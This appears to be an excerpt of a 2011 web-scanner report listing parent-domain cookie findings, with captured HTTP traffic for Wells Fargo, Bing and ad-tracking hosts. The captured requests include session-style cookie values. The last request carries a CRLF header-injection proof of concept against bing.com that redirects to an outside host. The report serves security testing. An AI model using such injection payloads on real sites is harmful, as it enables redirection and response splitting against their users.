The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Content-Length: 384
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&displayed=CHPPB_HomepagePrimary_mtg_t1govrefidmiweharr1,CHPSBA_HomepageSecondary_chk_packagesp3,
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:03 GMT
Content-type: text/html
Set-cookie: TCID=0007b089-750d-8c50-be96-e99900000049;Domain=.wellsfargo.com;Expires=Thu, 18-Jul-2013 09:41:03 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b32067863;Domain=.wellsfargo.com;Expires=Tue, 19-Jul-2011 13:41:03 GMT;Path=/
Content-Length: 0


13. Cookie scoped to parent domain
There are 28 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035874&rn=735981431&c7=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&c8=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20-%20ADH&c9=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 01:58:26 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 18-Jul-2013 01:58:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.2. http://c.atdmt.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=1A2694B1632F60E708B59685672F60DA HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.atdmt.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=39AE9E99C74F6BF03BB69CADC34F6B13&cb=1cc460cb9062000
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=39AE9E99C74F6BF03BB69CADC34F6B13; domain=.atdmt.com; expires=Sat, 04-Feb-2012 12:09:34 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 0


13.3. http://c.bing.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=20C55B5B3C8E668525A1596F388E6676
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=20C55B5B3C8E668525A1596F388E6676&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 12:09:33 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:32 GMT
Content-Length: 0


13.4. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=40317&ref=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&apv=false&rand=0.27036919072270393&sig=yiATPu1V HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311040702757; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: _lvd2="mPJshv1MhYq1peurTu/velXty3gxO0dAK4DoJEN0VUFQbO5UBgsqPVz1xfQCga1ux7y4+04dhUgLhsPAmU3vmR1v80Y9KizJsnotn6N6rbe6dmdB0YKlHmEjsFbY+Vb7SLmJfD9afX4="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 25-Jul-2011 14:46:22 GMT; Path=/
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: recs-e12d2d49134d4a5a55456c7e33d8990d="YGLIWLSCU9zh36cDmh3P3l85RKZEnC7kKxkoX5M8pN/WSlRYwycmulhMaFxig1+H"; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 02:03:22 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 01:58:22 GMT
Content-Length: 2687

outbrain_rater.returnedOdbData({'response':{'exec_time':10,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'211901593','req_id':'36fb7aed35f919c0d97b40044959a4c2'},'score':{'preferred
...[SNIP]...

13.5. https://online.wellsfargo.com/das/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/signon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /das/signon HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/das/channel/enrollDisplay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS; BRAND_COOKIE=COB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:50:06 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN=source=alternate; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

13.6. https://online.wellsfargo.com/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

13.7. http://paid.outbrain.com/network/redir

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /network/redir

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6 HTTP/1.1
Host: paid.outbrain.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:19 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 436
Date: Tue, 19 Jul 2011 01:58:18 GMT

<html>
   <body onload="document.location.replace('http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825')">
       <form meth
...[SNIP]...

13.8. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15482;CRE=42330443;PLA=58217920;ADI=240048897; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: spass=639dc8c25a6771ff844957f2a2748213; G12546=C1S98727-3-0-0-0-1311017115-2; G15482=C1S103937-42-0-0-0-1311016999-308

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15482=C1S103937-44-0-0-0-1311016999-23706; path=/; domain=.suitesmart.com; expires=Sun, 15-Jan-2012 01:58:25 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 19 Jul 2011 01:58:25 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

13.9. http://server.iad.liveperson.net/hc/3194108/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/3194108/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/3194108/?&site=3194108&cmd=mTagInPage&lpCallId=726132489740-21619860781&protV=20&lpjson=1&page=http%3A//www.codero.com/&id=4111753688&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=0 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5314624600296146657; LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; HumanClickSiteContainerID_3194108=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1311040808225

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_3194108=STANDALONE; path=/hc/3194108
Set-Cookie: LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; expires=Wed, 18-Jul-2012 02:02:49 GMT; path=/hc/3194108; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 02:02:49 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"726132489740-21619860781","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

13.10. https://wellsoffice.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 09:42:24 GMT
Content-length: 0
Content-type: text/html
Cache-Control: no-cache
Location: https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f
Set-Cookie: TLTSID=687AB7CCB1EB10B1991CF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC5BEB1EB10B1991DF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC65EB1EB10B1991EF87992750532; Path=/; Domain=.wellsfargo.com; Secure


13.11. http://www.bing.com/community/css-classnameexpansion.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /community/css-classnameexpansion.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/css-classnameexpansion.ashx?css=%2fcommunity%2fthemes%2fgeneric%2fcss%2flayout.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/css; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Telligent-Evolution: 5.5.134.12674
X-AspNet-Version: 2.0.50727
XSHOST: WS1
Vary: Accept-Encoding
Content-Length: 15825
Date: Tue, 19 Jul 2011 12:10:45 GMT
Connection: close
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/community
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:44 GMT; domain=.bing.com; path=/

.page-management-header { }.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-color:
...[SNIP]...

13.12. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search?q=http://xss.cx/%3f%0D%0ALocation:%20http://xss.cx/default.aspx?cwe-113-poc-via-bing.com HTTP/1.1
Host: www.bing.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
